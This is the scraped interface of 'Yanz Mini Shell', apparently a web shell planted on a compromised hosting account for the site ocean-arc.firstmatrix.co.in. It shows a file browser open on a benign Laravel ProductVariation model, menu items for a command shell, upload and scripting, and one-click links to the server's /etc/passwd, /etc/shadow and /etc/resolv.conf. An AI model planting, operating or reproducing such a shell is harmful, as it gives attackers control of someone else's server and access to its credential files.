Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
bootstrap
css
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php namespace App; use Illuminate\Database\Eloquent\Model; class ProductVariation extends Model { /** * The attributes that aren't mass assignable. * * @var array */ protected $guarded = ['id']; public function variations() { return $this->hasMany(\App\Variation::class); } public function variation_template() { return $this->belongsTo(\App\VariationTemplate::class); } }
Free Space : 11838046208 Byte